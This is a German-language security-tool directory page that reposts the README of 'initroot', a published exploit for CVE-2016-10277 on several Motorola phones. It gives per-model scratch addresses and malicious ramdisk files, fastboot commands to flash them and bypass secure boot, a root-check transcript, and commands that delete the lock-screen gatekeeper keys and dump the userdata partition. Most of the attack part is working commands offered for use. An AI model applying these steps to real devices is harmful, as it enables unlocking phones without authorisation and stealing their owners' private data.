Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
initroot — Ausnutzung von CVE-2016-10277 für Secure Boot und Device Locking-Bypass | Kitploit
Tools/GitHubGitHub/leosol/initroot
Android-SicherheitAuthentifizierung & AutorisierungPrivilege EscalationExploitationDatenexfiltrationMobile Sicherheit
GitHubleosol/initroot

initroot

Ausnutzung von CVE-2016-10277 für Secure Boot und Device Locking-Bypass

Repository anzeigen
53vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Ausnutzung von CVE-2016-10277

Weitere Informationen unter: https://alephsecurity.com/2017/06/07/initroot-moto/

Wenn Sie nur überprüfen möchten, ob Ihr Gerät verwundbar ist, ist es möglicherweise schneller, wenn Sie einfach das Stock-Ramdisk (ohne Modifikationen) flashen. Falls dies der Fall ist, suchen Sie einfach nach initroot-*-STOCK*.cpio.gz.

Motorola XT-1033

  • Scratch-Adresse: 0x11000000
  • Padding: 64MB
  • Stockrom gepaddetes Ramdisk: initroot-xt1033-p64-STOCK.cpio.gz
  • Stockrom gepatchtes und gepaddetes Ramdisk: initroot-xt1033-p64-MALICIOUS.cpio.gz

Motorola XT-1040

  • Scratch-Adresse: 0x11000000
  • Padding: 64MB
  • Stockrom gepaddetes Ramdisk: initroot-xt1040-p64-STOCK.cpio.gz
  • Stockrom gepatchtes und gepaddetes Ramdisk: initroot-xt1040-p64-MALICIOUS.cpio.gz

Motorola XT-1068

  • Scratch-Adresse: 0x11000000
  • Padding: 64MB
  • Stockrom gepaddetes Ramdisk: initroot-xt1068-p64-STOCK.cpio.gz
  • Stockrom gepatchtes und gepaddetes Ramdisk: initroot-xt1068-p64-MALICIOUS.cpio.gz

Motorola XT-1069

  • Scratch-Adresse: 0x11000000
  • Padding: 64MB
  • Stockrom gepaddetes Ramdisk: initroot-xt1069-p64-STOCK.cpio.gz
  • Stockrom gepatchtes und gepaddetes Ramdisk: initroot-xt1069-p64-MALICIOUS.cpio.gz

Motorola XT-1078

  • Scratch-Adresse: 0x11000000
  • Padding: 64MB
  • Stockrom gepaddetes Ramdisk: initroot-xt1078-p64-STOCK.cpio.gz
  • Stockrom gepatchtes und gepaddetes Ramdisk: initroot-xt1078-p64-MALICIOUS.cpio.gz

Motorola XT-1514

  • Scratch-Adresse: 0x90000000
  • Padding: 64MB
  • Stockrom gepaddetes Ramdisk: initroot-xt1514-p64-STOCK.cpio.gz
  • Stockrom gepatchtes und gepaddetes Ramdisk: initroot-xt1514-p64-MALICIOUS.cpio.gz

Ausführen und Überprüfen des Root-Zugriffs:

  • Flashen und Beheben von Bootloops:

    root@kitploit:~
    git clone https://github.com/leosol/initroot.git
    cd xt1040 (or any other folder)
    use ./run-malicious.sh, run-stockramfs.sh and solve-bootloop.sh (if you have any bootloop)
    Or use the following commands:
    fastboot flash aleph $FILE_NAME
    fastboot oem config fsg-id "a initrd=SCRATCH+PAD,LENGTH"
    fastboot continue
    #use the following to solve bootloops
    fastboot oem config fsg-id ""
    
  • Überprüfen der Root-Berechtigungen:

    root@kitploit:~
    root@debian-vaio:~/motoramfs/xt1040# adb devices
    List of devices attached
    * daemon not running. starting it now on port 5037 *
    * daemon started successfully *
    T0092020C5	device
    
    root@debian-vaio:~/motoramfs/xt1040# adb shell
    root@peregrine:/ # getenforce
    >Permissive
    
  • Was kann ich mit Root machen?

    root@kitploit:~
    #remove authentication as pointed out by @kraftdenker (tested on xt1068)
    mv /data/system/gatekeeper.password.key /data/system/_gatekeeper.password.key
    mv /data/system/gatekeeper.pattern.key /data/system/_gatekeeper.pattern.key
    
    #dump your data
    adb pull /dev/block/platform/msm_sdcc.1/by-name/userdata
    
    #or make it permanent
    
Tool herunterladen